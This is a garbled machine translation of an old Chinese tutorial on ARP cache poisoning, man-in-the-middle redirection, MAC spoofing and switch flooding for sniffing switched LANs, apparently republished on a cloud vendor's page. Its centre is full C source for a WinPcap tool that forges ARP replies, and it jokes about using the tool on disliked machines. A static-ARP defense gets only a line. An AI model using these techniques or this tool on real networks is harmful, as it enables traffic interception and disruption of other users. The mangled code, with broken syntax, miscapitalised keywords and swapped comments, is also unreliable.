ARP cache table
Suppose a network like this:
----------
| Hub |
----------
|
|
|
Hosta hostb hostc
Where
A address: IP: 192.168.10.1 Mac: AA-AA-AA-AA-AA-AA
B address: IP: 192.168.10.2 Mac: BB-BB-BB-BB-BB-BB
C Address: IP: 192.168.10.3 Mac: CC-CC-CC-CC-CC-CC
Assume that B belongs to a sniffing enthusiast, for example, machine A's ARP cache:
C:/> ARP-
Interface: 192.168.10.1 on interface 0x1000003
Internet address physical address type
CC-CC-CC-CC-CC-CC dynamic 192.168.10.3
This is the ARP cache table on the machine 192.168.10.1. Assume that a performs the ping 192.168.10.3 operation and Ping host C to query the local
In the ARP cache table, find the MAC address of the IP address of C, then data is transmitted, and the destination is the MAC address of C. If a does not contain c ARP records
Then a broadcasts an ARP request. When C receives a request from a, it sends a response containing the MAC address of C, and then a receives
After receiving the C response, the local ARP cache will be updated. Then use the MAC address to send data (the MAC address is appended to the NIC ).
Therefore, the local high-speed cache ARP table is the basis for local network circulation, and the cache is dynamic.
Hub-based)
Many networks are connected using hubs. When a data packet is transmitted to another computer through the hub, the hub simply broadcasts the data packet.
To all the ports of the hub.
This is a network structure in the preceding example.
Now a needs to send TCP packets to C. First, a needs to check the local ARP cache table to check whether there is an ARP record whose IP address is 192.168.10.3 or C.
If not, a will broadcast an ARP request. After receiving the request, C will respond and a will update its ARP cache table. And
Obtain the MAC address corresponding to the IP address of C. This TCP packet is transmitted, and the Ethernet frame contains the MAC address of C. When data packets are transmitted
When it arrives at the hub, the hub directly broadcasts the entire data packet to all ports, and then C can receive the data packet sent by.
Because the hub broadcasts data to all ports, computer B can also receive packets sent from A to C. This achieves the goal of B sniffing.
Therefore, the hub-based network is basically not secure, and sniffing is very easy in such a network.
Switched LAN)
The switch is used to replace the hub to solve several security problems of the hub, which is to solve the sniffing problem. Switch is not a count
Data packets are broadcast over ports. It uses its own ARP cache to determine the port on which data packets are transmitted. Therefore, if the above
In this example, if the hub is switched, B will not receive the packet sent by A to C. Even if the NIC is set to the hybrid mode, no sniffing is allowed.
ARP Spoofing)
ARP does not receive ARP responses only when an ARP request is sent. When the computer receives the ARP response packet, it caches the local ARP
Update and store the IP and MAC addresses in the response in the ARP cache. Therefore, in the above assumption network, B sends a self-forged ARP packet to
And the data in this response is the sender's IP address is 192.168.10.3 (the IP address of C), the MAC address is the DD-DD-DD-DD-DD-DD (the MAC address of C)
The address should have been a CC-CC-CC-CC-CC-CC, which was forged here ). When a receives B's forged ARP response, it updates the local ARP cache (A does not
).
Now machine A's ARP cache is updated:
C:/> ARP-
Interface: 192.168.10.1 on interface 0x1000003
Internet address physical address type
DD-DD-DD-DD-DD-DD dynamic 192.168.10.3
This is not a trivial matter. The network flow of a LAN is not carried out by IP address, but by MAC address. At 192.168.10.3
The MAC address is changed to a non-existent MAC address on. Now Ping 192.168.10.3 from A. the MAC address submitted by the NIC is
DD-DD-DD-DD-DD-DD, what is the result? The network is disconnected. A cannot Ping C at all !!
This is a simple ARP spoofing.
Let's implement this ARP spoofing. Here we need to use an API and driver provided by Winpcap. (Http://winpcap.polito.it /)
Winpcap is a great and open project. In Windows, Nmap, snort, and windump all use Winpcap.
//////////////////////////////////////// ///////////////////////////////////////
//
// ARP sender
//
// Creator: refdom
// Email: refdom@263.net
// Home page: www.opengram.com
//
// 2002/4/7
//
//////////////////////////////////////// ////////////////////////////////////////
# Include "stdafx. H"
# Include "Mac. H" // getmacaddr (). The function I wrote to convert a string to a MAC address is not listed here.
# Include <stdio. h>
# Include <packet32.h>
# Define ept_ip 0x0800/* type: IP */
# Define ept_arp 0x0806/* type: ARP */
# Define ept_rarp 0x8035/* type: RARP */
# Define arp_hardware 0x0001/* dummy type for 802.3 frames */
# Define arp_request 0x0001/* ARP request */
# Define arp_reply 0x0002/* ARP reply */
# Define max_num_adapter 10
# Pragma pack (push, 1)
Typedef struct ehhdr
{
Unsigned char eh_dst [6];/* destination Ethernet addrress */
Unsigned char eh_src [6];/* Source Ethernet addresss */
Unsigned short eh_type;/* Ethernet pachet type */
} Ehhdr, * pehhdr;
Typedef struct arphdr
{
Unsigned short arp_hrd;/* Format of hardware address */
Unsigned short arp_pro;/* Format of Protocol address */
Unsigned char arp_hln;/* length of hardware address */
Unsigned char arp_pln;/* length of Protocol address */
Unsigned short arp_op;/* arp/RARP operation */
Unsigned char arp_sha [6];/* sender hardware address */
Unsigned long arp_spa;/* sender Protocol address */
Unsigned char arp_tha [6];/* target hardware address */
Unsigned long arp_tpa;/* Target Protocol address */
} Arphdr, * parphdr;
Typedef struct arppacket
{
Ehhdr;
Arphdr;
} Arppacket, * parppacket;
# Pragma pack (POP)
Int main (INT argc, char * argv [])
{
Static char adapterlist [max_num_adapter] [1024];
Char szpacketbuf [600];
Char macaddr [6];
Lpadapter;
Lppacket;
Wchar adaptername [2048];
Wchar * temp, * temp1;
Arppacket;
Ulong adapterlength = 1024;
Int adapternum = 0;
Int nretcode, I;
// Get the list of adapter
If (packetgetadapternames (char *) adaptername, & adapterlength) = false)
{
Printf ("unable to retrieve the list of the adapters! /N ");
Return 0;
}
Temp = adaptername;
Temp1 = adaptername;
I = 0;
While (* temp! = '/0') | (* (temp-1 )! = '/0 '))
{
If (* temp = '/0 ')
{
Memcpy (adapterlist [I], temp1, (temp-temp1) * 2 );
Temp1 = temp + 1;
I ++;
}
Temp ++;
}
Adapternum = I;
For (I = 0; I <adapternum; I ++)
Wprintf (L "/n % d-% s/n", I + 1, adapterlist [I]);
Printf ("/N ");
// Default open the 0
Lpadapter = (lpadapter) packetopenadapter (lptstr) adapterlist [0]);
// Obtain the first NIC (assuming)
If (! Lpadapter | (lpadapter-> hfile = invalid_handle_value ))
{
Nretcode = getlasterror ();
Printf ("unable to open the driver, error code: % LX/N", nretcode );
Return 0;
}
Lppacket = packetallocatepacket ();
If (lppacket = NULL)
{
Printf ("/nerror: failed to allocate the lppacket structure .");
Return 0;
}
Zeromemory (szpacketbuf, sizeof (szpacketbuf ));
If (! Getmacaddr ("bbbbbbbbbbbbbb", macaddr ))
{
Printf ("Get MAC address error! /N ");
}
Memcpy (arppacket. ehhdr. eh_dst, macaddr, 6); // source MAC address
If (! Getmacaddr ("aaaaaaaaaaaa", macaddr ))
{
Printf ("Get MAC address error! /N ");
Return 0;
}
Memcpy (arppacket. ehhdr. eh_src, macaddr, 6); // target MAC address. (Address of)
Arppacket. ehhdr. eh_type = htons (ept_arp );
Arppacket. arphdr. arp_hrd = htons (arp_hardware );
Arppacket. arphdr. arp_pro = htons (ept_ip );
Arppacket. arphdr. arp_hln = 6;
Arppacket. arphdr. arp_pln = 4;
Arppacket. arphdr. arp_op = htons (arp_reply );
If (! Getmacaddr ("dddddddddddd", macaddr ))
{
Printf ("Get MAC address error! /N ");
Return 0;
}
Memcpy (arppacket. arphdr. arp_sha, macaddr, 6); // forged MAC address of C
Arppacket. arphdr. arp_spa = inet_addr ("192.168.10.3"); // ip address of C
If (! Getmacaddr ("aaaaaaaaaaaa", macaddr ))
{
Printf ("Get MAC address error! /N ");
Return 0;
}
Memcpy (arppacket. arphdr. arp_tha, macaddr, 6); // MAC address of target
Arppacket. arphdr. arp_tpa = inet_addr ("192.168.10.1"); // ip address of target
Memcpy (szpacketbuf, (char *) & arppacket, sizeof (arppacket ));
Packetinitpacket (lppacket, szpacketbuf, 60 );
If (packetsetnumwrites (lpadapter, 2) = false)
{
Printf ("Warning: unable to send more than one packet in a single write! /N ");
}
If (packetsendpacket (lpadapter, lppacket, true) = false)
{
Printf ("error sending the packets! /N ");
Return 0;
}
Printf ("Send OK! /N ");
// Close the adapter and exit
Packetfreepacket (lppacket );
Packetcloseadapter (lpadapter );
Return 0;
}
So a receives a spoofed ARP response. A Is cheated !! If a certain machine is not pleasing to the eye in the LAN ,......
Ethernet sniffing is very useful, but the switching network imposes restrictions on sniffing, greatly reducing the depth of sniffing. However, it is easy
The cache table in the host and switch (dynamically update the Address Table type, the same below) is still (mainly) dynamic. To be in a switched network
Conduct effective sniffing (underground party ?), We need to deal with a variety of cache tables, and even fool the above ARP spoofing basics.
.
ARP spoofing on the target
As implemented in the above program, to target a spoofing, A to ping host C but sent to the DD-DD-DD-DD-DD-DD address. For example
If the MAC address of C is spoofed into a BB-BB-BB-BB-BB-BB, the packets sent by A to C become sent to B. This is not correct
Is B able to receive the data packet sent by a, and the sniffing is successful.
A is not aware of this change at all, but the following things make a suspect. Because A and C cannot be connected !! B connects to receive a's message
Data packets sent to C may not be transferred to C.
Perform "man in the middle" and perform ARP redirection. Enable the IP forwarding function of B. The packet sent by a is forwarded to C, which is like a route
. However, if B sends ICMP redirection, the entire plan is interrupted.
Directly modify and forward the entire packet, capture all the packets sent by a, and then send them to C. The packets received by C are fully considered
Sent from. However, the packets sent by C are directly transmitted to a, if the ARP spoofing to C is performed again. B is now the intermediate bridge between A and C.
Beam.
Mac spoofing on the switch
The switch also maintains a dynamic Mac cache. This is generally the case. First, there is a corresponding list inside the switch.
The MAC Address Table port n <-> Mac records the MAC addresses under each port. This table is left empty and the switch learns from the incoming and outgoing data frames.
XI. For example, when the computer connected to Port 1 sends a data frame, the data frame enters the switch from Port 1, and the switch obtains the data frame.
The original MAC address AAAA, and then record in the Address Table: Port 1 <-> AAAA. After that, all data frames sent to the MAC address AAAA are all from Port 1.
Port output instead of other ports.
Spoofing is similar to the previous targeting. If the Mac-port table on the switch is modified, the corresponding MAC and port will change the same.
The data that should not be sent to the sniffer is sent, which also achieves the purpose of sniffing. Modify the MAC address of the data packet sent locally (B)
MAC address. When passing through the switch, the switch finds that the address corresponding to port B is the MAC address of machine A, so it will compare the MAC address of a with that of port B.
Therefore, the data sent to a is transmitted from Port B, which should have been transmitted to port. Therefore, machine B can obtain the data sent to.
However, there is a problem here that a will not receive the data. Sniffing is not intended to disrupt normal data communication. In addition, from the spoofing,
It is unclear whether a MAC address in the vswitch corresponds to multiple ports. For more information, see.
Flood the switch
As we have introduced the principle of establishing the Mac-port ing between the switch, because the Mac-port cache table is dynamically updated, the entire switch end is
The port table changes, and the MAC address spoofing flood is used to send a large number of packets with fake mac addresses. Then, the switch updates the Mac-port cache.
If the normal Mac-port relationship is damaged in the past, the switch will send a flood to every port, so that the switch base
It turns into a hub, which sends data packets to all ports for the same purpose as sniffing.
The switch can handle this limit, because it is abnormal and may cause packet loss. And now
The switch status is unknown. If network communication is greatly damaged, this is not a normal sniffing (Sniffing may also cause some loss ).
You must be careful when performing various operations on the switch. If Port Protection is enabled, the switch may shut down all users. Therefore
If a device such as a host is spoofed or another operation is performed, it is better to cheat some upper-level devices, such as the target host or router.
As for the above methods of sniffing, they are all based on this dynamic table. Therefore, static ARP can be used for defense. For Win, use
ARP-S for static ARP settings.
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
